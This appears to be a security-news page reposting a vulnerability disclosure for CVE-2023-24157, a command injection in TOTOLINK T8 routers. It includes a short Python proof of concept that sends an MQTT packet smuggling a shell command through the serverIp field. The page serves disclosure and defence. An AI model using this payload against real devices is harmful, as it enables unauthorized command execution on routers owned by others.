Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-24157: CVE-vulns/updateWifiInfo.md at main · Double-q1015/CVE-vulns

A command injection vulnerability in the serverIp parameter in the function updateWifiInfo of TOTOLINK T8 V4.1.5cu allows attackers to execute arbitrary commands via a crafted MQTT packet.

CVE
Open in Source
#vulnerability#wifi

A command injection vulnerability in the function updateWifiInfo of TOTOLINK Technology routers T8 V4.1.5cu allows attackers to execute arbitrary commands via a crafted MQTT packet.

In function updateWifiInfo,The “serverIp” parameter does not filter user input, which can cause command injection vulnerabilities

import paho.mqtt.client as mqtt

client = mqtt.Client()
client.connect("192.168.0.1",1883,60)
client.publish("totolink/router/updateWifiInfo", b'{"newMd5":"1","serverIp":";ls>/tmp/updateWifiInfo.txt;"}')

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE